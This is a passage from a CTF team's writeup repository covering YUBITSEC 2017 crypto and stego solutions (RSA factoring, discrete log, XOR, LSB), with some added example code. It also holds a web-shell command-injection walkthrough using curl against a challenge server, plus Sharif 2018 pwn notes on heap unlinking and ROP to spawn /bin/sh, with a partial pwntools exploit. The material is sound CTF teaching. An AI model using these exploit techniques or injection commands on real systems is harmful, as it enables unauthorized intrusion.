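    tag = hmac.new(key, body.encode("ascii"), hashlib.sha256).digest()
    return body + "." + b64e(tag)


def read_cookie(cookie, key=SECRET_KEY):
    """Return the state carried by the cookie, or None if it was not issued by us."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None                     # no tag at all (e.g. a bare base64 payload)
    try:
        expected = hmac.new(key, body.encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64d(tag)):
            return None                 # tampered body or forged tag
        state = b64d(body).decode("utf-8")
    except (ValueError, UnicodeError):  # malformed base64 / non-ASCII input
        return None
    # Even an authentic value is only data: accept it solely as a key into a fixed set.
    return state if state in ALLOWED_STATES else None


if __name__ == "__main__":
    c = issue_cookie("images")
    print(c, "->", read_cookie(c))
    print("bare payload ->", read_cookie(b64e(b"cat flag1337")))
```

The allow-list matters as much as the MAC: a leaked or weak key would let someone mint an authentic cookie, and the second line of defence is that the server only ever looks the value up, it does not interpret it.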
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/diffie_hellman/img/crypto.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/diffie_hellman/img/crypto.jpg
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/diffie_hellman/readme.md:
--------------------------------------------------------------------------------
**Diffie Hellman - Crypto - 225**

Statement:

```
Just find a and b

Note: Flag format will be YUBITSEC{a,b}

```
![Alt](img/crypto.jpg "crypto")

__Solution:__

The image gives us the following information:
```
q=1357
g=10

g^a mod q = 419
g^b mod q = 34
g^ab mod q = 33

a < 1000
b < 1000
```
With Sagemath we solve the equations by brute force:

```
sage: for a in range(1000):
....:     if int(pow(g,a)%q)==419:
....:         print "trouver :"+str(a)
....:
....:
trouver :521

sage: for b in range(1000):
....:     if int(pow(g,b)%q)==34:
....:         print "trouver :"+str(b)
....:
....:
....:
trouver :619
```

flag : YUBITSEC{521,619}

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/easy/readme.md:
--------------------------------------------------------------------------------
**Easy - Crypto - 100**

Statement:

```
Seems like there must be hiding flag, find it!
```
[Sources](src/)

__Solution:__

We have a list of MD5 hashes; we crack them with [hashkiller](https://hashkiller.co.uk/md5-decrypter.aspx):

```
MD5?_Hell_Yes!_So_you_know_what_do_you[...]


YUBITSEC{I_h0p3_y0u_didn't_try_t0_d3crpyt_on3_by_on3}


maybe_flag_can_be_little_bit_upI_think_flag_won't_be_ending_part
```

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa/readme.md:
--------------------------------------------------------------------------------
**RSA 1 - Crypto - 325**

Statement:

```
Can you decrypt these ciphertexts ?
```
[Sources](src/)

__Solution:__

Same procedure for all 3 keys.

We extract the information contained in the public key:
```BASH
openssl rsa -in pubkey.pem -pubin -text -modulus
```

We notice that the modulus is small:

```
Public-Key: (149 bit)
Modulus:
    1a:ac:d3:c9:0d:1a:bd:fd:dd:de:18:35:f5:8a:88:
    f0:36:8b:9f
Exponent: 65537 (0x10001)
Modulus=1AACD3C90D1ABDFDDDDE1835F58A88F0368B9F
-----BEGIN PUBLIC KEY-----
MC4wDQYJKoZIhvcNAQEBBQADHQAwGgITGqzTyQ0avf3d3hg19YqI8DaLnwIDAQAB
-----END PUBLIC KEY-----
Public-Key: (154 bit)
Modulus:
    03:8a:f3:1e:59:8e:24:2b:5f:cf:1b:30:6f:df:f0:
    e2:d6:6e:f2:39
Exponent: 65537 (0x10001)
Modulus=38AF31E598E242B5FCF1B306FDFF0E2D66EF239
-----BEGIN PUBLIC KEY-----
MC8wDQYJKoZIhvcNAQEBBQADHgAwGwIUA4rzHlmOJCtfzxswb9/w4tZu8jkCAwEA
AQ==
-----END PUBLIC KEY-----
Public-Key: (151 bit)
Modulus:
    65:7a:90:84:26:10:1a:fa:25:51:cf:ca:26:e3:9a:
    f5:64:53:27
Exponent: 65537 (0x10001)
Modulus=657A908426101AFA2551CFCA26E39AF5645327
-----BEGIN PUBLIC KEY-----
MC4wDQYJKoZIhvcNAQEBBQADHQAwGgITZXqQhCYQGvolUc/KJuOa9WRTJwIDAQAB
-----END PUBLIC KEY-----
```
We convert the modulus from hex to int and factor it:
```PYTHON
sage : n=int("mon_modulo_en_hexa",16)
sage : factor(n)
```

We get p & q and rebuild the private key with rsatool:

```BASH
python rsatool.py -p mon_p -q mon_q -f PEM -o privkey.pem
```

We decrypt:
```BASH
openssl rsautl -decrypt -inkey privkey.pem -in cipher.txt
```

flag : YUBITSEC{S4V3_FL46}

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa/src/RSA/Part1/PublicKey1.pem:
--------------------------------------------------------------------------------
-----BEGIN PUBLIC KEY-----
MC4wDQYJKoZIhvcNAQEBBQADHQAwGgITGqzTyQ0avf3d3hg19YqI8DaLnwIDAQAB
-----END PUBLIC KEY-----
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa/src/RSA/Part1/ciphertext1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/rsa/src/RSA/Part1/ciphertext1
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa/src/RSA/Part2/PublicKey2.pem:
--------------------------------------------------------------------------------
-----BEGIN PUBLIC KEY-----
MC8wDQYJKoZIhvcNAQEBBQADHgAwGwIUA4rzHlmOJCtfzxswb9/w4tZu8jkCAwEA
AQ==
-----END PUBLIC KEY-----
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa/src/RSA/Part2/ciphertext2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/rsa/src/RSA/Part2/ciphertext2
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa/src/RSA/Part3/PublicKey3.pem:
--------------------------------------------------------------------------------
-----BEGIN PUBLIC KEY-----
MC4wDQYJKoZIhvcNAQEBBQADHQAwGgITZXqQhCYQGvolUc/KJuOa9WRTJwIDAQAB
-----END PUBLIC KEY-----
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa/src/RSA/Part3/ciphertext3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/rsa/src/RSA/Part3/ciphertext3
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa2/readme.md:
--------------------------------------------------------------------------------
**RSA 2 - Crypto - 350**

Statement:

```
Can you decrypt these ciphertexts ?
```
[Sources](src/)

__Solution:__

We extract the information contained in the public key:

```BASH
openssl rsa -in pubkey.pem -pubin -text -modulus
```
```
Public-Key: (7470 bit)
Modulus:
    3f:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    [...]
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
    00:00:00:01
Exponent: 65537 (0x10001)
Modulus=3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF[...]0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001
-----BEGIN PUBLIC KEY-----
MIIDxzANBgkqhkiG9w0BAQEFAAOCA7QAMIIDrwKCA6Y/////////////////////
//////////////////////////////////////////////////////////////// 
[...]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAABAgMBAAE=
-----END PUBLIC KEY-----
```

We convert the modulus from hex to int:
```
sage : n=int("mon_modulo_en_hexa",16)
```

The modulus is far too long to be factored directly.

We check whether it has already been factored on [factordb](http://factordb.com/):

=> fully factored: we have both factors p & q.

We rebuild the private key with rsatool:
```BASH
python rsatool.py -p mon_p -q mon_q -f PEM -o privkey.pem
```

We decrypt:

```BASH
openssl rsautl -decrypt -inkey privkey.pem -in cipher.txt
```

YUBITSEC{G00D_J0B_BRO_Y0U_MUST_KN0W_H0W_D03S_1T_W0RKS}

By team Beers4Flags
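Back to the Diffie-Hellman readme above (2017/yubitsec/crypto/diffie_hellman): added example, not from the repository, that does the same brute-force discrete-log search in plain Python instead of Sage and goes one step further than the readme by deriving the shared secret from each side and checking it against the third value printed on the image (33). The parameters are the ones the image states; the search is linear in the bound, which is only workable because q is a four-digit number.

```python
"""Brute-force discrete log for the tiny Diffie-Hellman parameters in the readme."""

# Parameters read off the challenge image (diffie_hellman readme above).
Q, G = 1357, 10
A_PUB, B_PUB, SHARED = 419, 34, 33
BOUND = 1000  # the readme states a < 1000 and b < 1000


def brute_dlog(g, h, q, bound):
    """Smallest x in [0, bound) with g^x = h (mod q), or None if there is none.
    One multiplication per step instead of a fresh pow(): acc always equals g^x mod q."""
    acc = 1
    for x in range(bound):
        if acc == h:
            return x
        acc = acc * g % q
    return None


def shared_secret(peer_public, own_private, q):
    """Standard DH: (g^peer)^own mod q."""
    return pow(peer_public, own_private, q)


def solve():
    """Recover both private exponents and confirm they agree on the shared key."""
    a = brute_dlog(G, A_PUB, Q, BOUND)
    b = brute_dlog(G, B_PUB, Q, BOUND)
    k_from_a = shared_secret(B_PUB, a, Q)   # what Alice computes
    k_from_b = shared_secret(A_PUB, b, Q)   # what Bob computes
    if k_from_a != k_from_b:
        raise ValueError("exponents do not agree on a shared key")
    return a, b, k_from_a


if __name__ == "__main__":
    a, b, k = solve()
    print("a=%d b=%d shared=%d (image says %d)" % (a, b, k, SHARED))
```

The cross-check is what distinguishes a correct pair from a coincidental hit: with a 1357-element group several exponents can map to the same public value, and only the pair whose shared secret matches both sides is consistent with all three numbers on the image.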
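The two RSA readmes above both reduce to the same step once N is factored (by Sage's `factor()` for the 149- to 154-bit moduli, by a factordb lookup for the 7470-bit special-form one): rebuild d from p, q and e, then decrypt. Added example, not code from the repository or from rsatool: the arithmetic rsatool performs, with the factoring done by Pollard's rho on a constructed 60-bit modulus (two roughly 30-bit primes, an assumption chosen so the search finishes in well under a second; the challenge moduli are not reproduced here). This is textbook RSA without the PKCS#1 padding that `openssl rsautl` strips.

```python
"""Small RSA modulus: factor N, rebuild the private key, decrypt (textbook RSA, no padding)."""
import math

E = 65537

# Constructed toy modulus: 998244353 * 1000000007, two well-known ~30-bit primes.
# The challenge moduli (149-154 bits) are still tiny by RSA standards but would need
# a real factoring tool; this one lets Pollard's rho finish in a blink.
N_DEMO = 998244359987710471


def pollard_rho(n):
    """Return a non-trivial factor of composite n (Pollard's rho with Floyd cycle finding).
    Expected cost is about sqrt(smallest prime factor) steps, which is why small primes are fatal."""
    if n % 2 == 0:
        return 2
    for c in range(1, 50):              # retry with another polynomial x^2 + c if we hit n
        x = y = 2
        d = 1
        while d == 1:
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:
            return d
    raise ValueError("no factor found; is n prime?")


def factor_semiprime(n):
    """(p, q) sorted, for n = p*q."""
    p = pollard_rho(n)
    q = n // p
    if p * q != n:
        raise ValueError("unexpected factorisation")
    return tuple(sorted((p, q)))


def egcd(a, b):
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - (a // b) * y


def modinv(a, m):
    """Extended Euclid; d = e^-1 mod phi(N) is the step rsatool performs from p and q."""
    g, x, _ = egcd(a % m, m)
    if g != 1:
        raise ValueError("e is not invertible modulo phi(N)")
    return x % m


def private_exponent(n, e=E):
    p, q = factor_semiprime(n)
    return modinv(e, (p - 1) * (q - 1))


def encrypt(m, n, e=E):
    return pow(m, e, n)


def decrypt(c, n, d):
    return pow(c, d, n)


if __name__ == "__main__":
    d = private_exponent(N_DEMO)
    m = int.from_bytes(b"S4V3", "big")
    print(factor_semiprime(N_DEMO), decrypt(encrypt(m, N_DEMO), N_DEMO, d) == m)
```

Pollard's rho is the wrong tool for the 7470-bit key, and so is Sage's `factor()`; that modulus gave way because its special shape (a run of 0xFF bytes followed by zeros and a 1) had already been factored and recorded in factordb, which is a reminder that "too big to factor" is not the same as "not already factored".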
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa2/src/PublicKey.pem:
--------------------------------------------------------------------------------
-----BEGIN PUBLIC KEY-----
MIIDxzANBgkqhkiG9w0BAQEFAAOCA7QAMIIDrwKCA6Y/////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
///f////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
///////////////////////////////////////////////+AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAABAgMBAAE=
-----END PUBLIC KEY-----
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/rsa2/src/ciphertext:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/rsa2/src/ciphertext
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/simple_encryption/readme.md:
--------------------------------------------------------------------------------
**Simple Encryption - Crypto - 175**

Statement:

```
Two files are provided:

1 - A ciphertext
2 - The python script used to encrypt it
```
[Sources](src/)

__Solution:__

The "encryption" script XORs each character (as a decimal value) with the number 62.

Doing the same again recovers the flag in clear:

```PYTHON
encrypted=[103,107,124,119,106,109,123,125,69,73,91,82,82,97,89,76,91,95,74,67]
char=""
for nb in encrypted:
    char+=chr(nb^62)
print(char)
```
YUBITSEC{well_great}

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/simple_encryption/src/encrypted:
--------------------------------------------------------------------------------
20 20 20 108 123 122 127 125 106 123 122 20 20 20
--------------------------------------------------------------------------------
/2017/yubitsec/crypto/simple_encryption/src/simple_enc.py:
--------------------------------------------------------------------------------


f = open("encrypted","w")

secret = "***REDACTED***"



def enc_af(text):
    temp = ""
    for char in text:
        temp += str(ord(char)^62) + " "

    return temp



f.write(enc_af(secret))
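The fixed single-byte XOR above is weaker than the readme lets on: the key does not need to be read out of `simple_enc.py`. Added example, not code from the repository: decode the readme's byte list, recover the key from nothing but the known flag prefix `YUBITSEC{`, and apply the same check to the distributed `src/encrypted` file, where it fails because that file holds the `***REDACTED***` placeholder rather than the flag. The disagreement between positions is how you tell a wrong crib from a wrong cipher model.

```python
"""Single-byte XOR as used by simple_enc.py: decode, and recover the key from a known
plaintext prefix without reading the source."""

# Values from the readme above (the unredacted ciphertext).
ENCRYPTED = [103, 107, 124, 119, 106, 109, 123, 125, 69, 73, 91, 82, 82, 97, 89, 76, 91, 95, 74, 67]
# Content of src/encrypted as distributed (the REDACTED placeholder run through the same script).
ENCRYPTED_FILE = "20 20 20 108 123 122 127 125 106 123 122 20 20 20"


def parse_encrypted(text):
    """simple_enc.py writes space-separated decimal byte values."""
    return bytes(int(tok) for tok in text.split())


def xor_with_key(data, key):
    """XOR every byte with the same key byte (encryption and decryption are identical)."""
    return bytes(b ^ key for b in data)


def recover_key(ciphertext, known_prefix):
    """Single-byte XOR leaks the key wherever plaintext is known: c ^ p == key.
    Every known position must yield the same byte; otherwise the key is not a single
    byte or the crib does not belong to this ciphertext."""
    if len(ciphertext) < len(known_prefix):
        return None
    keys = {c ^ p for c, p in zip(ciphertext, known_prefix)}
    return keys.pop() if len(keys) == 1 else None


def decrypt_with_prefix(ciphertext, known_prefix=b"YUBITSEC{"):
    """Return (key, plaintext) using only the flag format as the crib."""
    key = recover_key(ciphertext, known_prefix)
    if key is None:
        raise ValueError("crib does not fit a single-byte XOR key")
    return key, xor_with_key(ciphertext, key).decode("ascii")


if __name__ == "__main__":
    print(decrypt_with_prefix(bytes(ENCRYPTED)))
    print(recover_key(parse_encrypted(ENCRYPTED_FILE), b"YUBITSEC{"))
    print(xor_with_key(parse_encrypted(ENCRYPTED_FILE), 62))
```

Scoring all 256 keys by letter frequency is the usual crib-free alternative, but on a 20-byte flag several keys produce all-letter output, so a format crib is the more reliable tool for CTF-sized inputs.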
--------------------------------------------------------------------------------
/2017/yubitsec/stegano/blushes/img/indir.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/stegano/blushes/img/indir.png
--------------------------------------------------------------------------------
/2017/yubitsec/stegano/blushes/img/solved.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/stegano/blushes/img/solved.bmp
--------------------------------------------------------------------------------
/2017/yubitsec/stegano/blushes/readme.md:
--------------------------------------------------------------------------------
**Blushes - Stegano - 50**

Statement:

![Alt](img/indir.png "enonce")

__Solution:__

Analysing the image with stegsolve, we notice a QR code on all the RGB filters.

![Alt](img/solved.bmp "qrcode")

We upload the QR code to this site:
[Decode qrcode](https://zxing.org/)

We obtain the flag:
YUBITSEC{hello_nothing_here}

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/yubitsec/stegano/falkreath/img/ciceros.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/stegano/falkreath/img/ciceros.jpg
--------------------------------------------------------------------------------
/2017/yubitsec/stegano/falkreath/readme.md:
--------------------------------------------------------------------------------
**Falkreath - Stegano - 100**

Statement:

```
What is the music of life?
7 | ``` 8 | 9 | ![Alt](img/ciceros.jpg "ciceros") 10 | 11 | 12 | __Résolution :__ 13 | 14 | Après quelques recherche sur internet on trouve : 15 | 16 | [forum skyrim](https://www.gamefaqs.com/boards/615803-the-elder-scrolls-v-skyrim/61368267) 17 | ```BASH 18 | steghide --extract -sf ciceros.jpg 19 | 20 | mot de passe : silence 21 | ``` 22 | 23 | Le flag s'extrait : 24 | 25 | YUBITSEC{welcome_home!} 26 | 27 | 28 | By team Beers4Flags 29 | 30 | 31 | ``` 32 | ________ 33 | | | 34 | | #BFF | 35 | |________| 36 | _.._,_|,_ 37 | ( | ) 38 | ]~,"-.-~~[ 39 | .=] Beers ([ 40 | | ]) 4 ([ 41 | '=]) Flags [ 42 | |:: ' | 43 | ~~----~~ 44 | ``` 45 | -------------------------------------------------------------------------------- /2017/yubitsec/stegano/text_into_image/img/lsb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/stegano/text_into_image/img/lsb.png -------------------------------------------------------------------------------- /2017/yubitsec/stegano/text_into_image/readme.md: -------------------------------------------------------------------------------- 1 | **Text into image - Stegano - 150** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | Shaco is hiding something! 7 | ``` 8 | 9 | ![Alt](img/lsb.png "lsb") 10 | 11 | 12 | __Résolution :__ 13 | 14 | Le nom de l'image nous fait tout de suite penser à du LSB. 15 | 16 | En analysant l'image avec stegsolve on remarque des traces de points en colonnes sur les positions 0 et 1 des couleurs RGB. 
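As an added example (not the writeup's code nor the online tool's), the snippet below embeds text in bit planes 0 and 1 of each RGB channel of a constructed image and renders the bit-plane view that exposed it in stegsolve; the bit layout (two bits per channel, a 4-byte length prefix, MSB first) is an assumption of this example and may differ from the tool's.

```python
#!/usr/bin/env python3
# Added example (not part of the writeup): how a text hidden in the two lowest
# bits of each RGB channel looks, and why stegsolve's bit-plane view exposes it.
# The bit layout (2 bits per channel, R then G then B, pixels in raster order,
# a 4-byte big-endian length prefix, bits MSB first) is an assumption of this
# example; the online tool used in the writeup may use a different layout.

BITS_PER_CHANNEL = 2          # the writeup saw dots on bit planes 0 and 1
MASK = (1 << BITS_PER_CHANNEL) - 1


def text_to_bits(text):
    """Length prefix + UTF-8 bytes, as a list of bits, MSB first."""
    data = text.encode('utf-8')
    payload = len(data).to_bytes(4, 'big') + data
    return [(b >> (7 - i)) & 1 for b in payload for i in range(8)]


def embed(pixels, text):
    """Return a copy of pixels (list of (r, g, b)) carrying text in the low bits."""
    bits = text_to_bits(text)
    capacity = len(pixels) * 3 * BITS_PER_CHANNEL
    if len(bits) > capacity:
        raise ValueError('message needs %d bits, image holds %d' % (len(bits), capacity))
    out, pos = [], 0
    for px in pixels:
        new = []
        for ch in px:
            if pos < len(bits):
                chunk = bits[pos:pos + BITS_PER_CHANNEL]
                pos += BITS_PER_CHANNEL
                chunk += [0] * (BITS_PER_CHANNEL - len(chunk))   # pad the last chunk
                value = 0
                for bit in chunk:
                    value = (value << 1) | bit
                ch = (ch & ~MASK) | value     # replace the low bits only
            new.append(ch)
        out.append(tuple(new))
    return out


def extract(pixels):
    """Read the low bits back and decode the length-prefixed text."""
    bits = []
    for px in pixels:
        for ch in px:
            for shift in range(BITS_PER_CHANNEL - 1, -1, -1):
                bits.append((ch >> shift) & 1)
    raw = bytes(int(''.join(map(str, bits[i:i + 8])), 2)
                for i in range(0, len(bits) - len(bits) % 8, 8))
    n = int.from_bytes(raw[:4], 'big')
    return raw[4:4 + n].decode('utf-8')


def bit_plane(pixels, width, channel, bit):
    """The view stegsolve gives for e.g. 'Red plane 0': one line per image
    row, '#' where the bit is set and '.' where it is clear."""
    rows = []
    for start in range(0, len(pixels), width):
        row = pixels[start:start + width]
        rows.append(''.join('#' if (px[channel] >> bit) & 1 else '.' for px in row))
    return rows


def plane_density(pixels, channel, bit):
    """Fraction of pixels whose given bit is set: a smooth cover gives a very
    low or very regular value, hidden data pushes it towards 0.5."""
    ones = sum((px[channel] >> bit) & 1 for px in pixels)
    return ones / len(pixels)


# Constructed cover image: a 16x8 gradient whose two low bits are all zero,
# so every '#' that appears on planes 0 and 1 comes from the hidden text.
WIDTH, HEIGHT = 16, 8
COVER = [(x * 16, y * 32, 128) for y in range(HEIGHT) for x in range(WIDTH)]
FLAG = 'YUBITSEC{now_you_see_me}'   # the writeup's flag, used as sample text

if __name__ == '__main__':
    stego = embed(COVER, FLAG)
    print('\n'.join(bit_plane(stego, WIDTH, 0, 0)))
    print('red plane 0 density: cover %.2f, stego %.2f'
          % (plane_density(COVER, 0, 0), plane_density(stego, 0, 0)))
    print('recovered:', extract(stego))
```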
We upload the image to this site:
[Stegano_online](http://manytools.org/hacker-tools/steganography-encode-text-into-image/go)

We get the flag:
YUBITSEC{now_you_see_me}

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/yubitsec/warmup/bash/readme.md:
--------------------------------------------------------------------------------
**Bash - Warmup - 5**

Challenge statement:

```
BFYRGHVX{ZGYZHS_MLG_DVOXLNV_SVIV}
```

__Solution:__

It is Atbash (the Hebrew mirror-alphabet transformation).

We decode it on: [dcode](http://www.dcode.fr/chiffre-miroir-atbash)

YUBITSEC{ATBASH_NOT_WELCOME_HERE}

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/yubitsec/web/webshell/img/shell_as_service.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/web/webshell/img/shell_as_service.png
--------------------------------------------------------------------------------
/2017/yubitsec/web/webshell/readme.md:
--------------------------------------------------------------------------------
**Webshell - Web - 300**

Challenge statement:

```
Now somebody uploaded a web shell to my web server. What a nice guy hurray!

http://138.197.41.168:8081/

HINT: I think somebody used some commands already but I could not figure how to find them.
```

![Alt](img/shell_as_service.png "shell_as_service.png")

__Solution:__

First we inject a basic command:
```bash
curl -XPOST http://138.197.41.168:8081/ --data "command=ls"

index.php shell.jpg flag.txt
```

The file flag.txt is not directly readable.

The hint is a strong pointer to the command to inject:

```bash
curl -XPOST http://138.197.41.168:8081/ --data "command=history"

1 ZXh0c
2 mFfc2
3 VjdXJ
4 lX2Zp
5 bGVfc
6 mVhZG
7 Vy
```
We decode the base64:

```bash
echo -n 'ZXh0c mFfc2 VjdXJ lX2Zp bGVfc mVhZG Vy' | base64 -di

extra_secure_file_reader
```
Now we read the file we are interested in:

```bash
curl -XPOST http://138.197.41.168:8081/ --data "command=extra_secure_file_reader flag.txt"

YUBITSEC{shello_shello_are_you_thereo}
```

By team Beers4Flags
--------------------------------------------------------------------------------
/2018/Inshack/Forensic/Worm-in-apple/source/DoxyDoxygen.sublime-package:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Inshack/Forensic/Worm-in-apple/source/DoxyDoxygen.sublime-package
--------------------------------------------------------------------------------
/2018/Inshack/Web/Crimemail/img/accueil.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Inshack/Web/Crimemail/img/accueil.png
--------------------------------------------------------------------------------
/2018/Inshack/Web/Crimemail/img/detect.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Inshack/Web/Crimemail/img/detect.png
--------------------------------------------------------------------------------
/2018/Inshack/Web/Crimemail/img/sqli.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Inshack/Web/Crimemail/img/sqli.png
--------------------------------------------------------------------------------
/2018/Sharif/Pwn250-t00p_secrets/README.md:
--------------------------------------------------------------------------------
---
layout: post
title: "Sharif
date: 3 Février 2018
comments: true
categories: wu
auteur: françois
---
```
===== INFOS =====
Filename            t00p_secrets
File format         ELF64
Architecture        x86-64
Endianess           little endian
Entry point         0x4008f0
Loadables segments  2
Sections            27

NX bit              enabled
SSP                 enabled
Relro               full
RPATH               no rpath
RUNPATH             no runpath
PIE                 disabled
```
The binary has an off-by-one that lets us modify the prev_inuse (previous-in-use) field of a chunk. We can therefore do a safe unlink by laying out [fake chunk][0...0][chunk size] | writing a 0 over the length of a block of size 0x200: the previous block will then be marked as free.
Freeing the block then creates an entry (number 4) in the list of secrets that lets us modify another entry (number 1).

We then display the GOT entry of puts, deduce the libc from it (xenial 2.23), then point __free_hook at 6 and destroy secret 0, which contains /bin/sh.

We then have a shell.
--------------------------------------------------------------------------------
/2018/Sharif/Pwn250-t00p_secrets/t00p_secrets:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Pwn250-t00p_secrets/t00p_secrets
--------------------------------------------------------------------------------
/2018/Sharif/Pwn75-leak_puts/README.md:
--------------------------------------------------------------------------------
---
layout: post
title: "Sharif
date: 3 Février 2018
comments: true
categories: wu
auteur: jambon69
---
```
===== INFOS =====
Filename            vuln4
File format         ELF32
Architecture        x86
Endianess           little endian

NX bit              enabled
Relro               disabled
PIE                 disabled
```

The binary asks us to find the address of puts ourselves, with a read on stdin right after.

So we generate a first ROP chain that leaks the address of puts and then jumps back to main.
Once the address of puts is known, we can recover the address of system (the libc in use is provided to us).
All that is left is to send a second ROP chain that executes /bin/sh, and the job is done.
--------------------------------------------------------------------------------
/2018/Sharif/Pwn75-leak_puts/exploit.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python3

from pwn import *

context(arch='x86', os='linux', endian='little', word_size=32, log_level='info')

HOST = 'ctf.sharif.edu'
PORT = 4801
# p = remote(HOST, PORT)

p = process('./vuln4')
elf = ELF('./vuln4')
libc = ELF('libc.so.6')   # the libc shipped with the challenge

# First chain: puts(got['puts']) leaks the libc address of puts, then we
# return to main to get a second read on stdin.
rop = ROP(elf)
rop.puts(elf.got['puts'])
rop.call(elf.symbols['main'])

print(rop.dump())

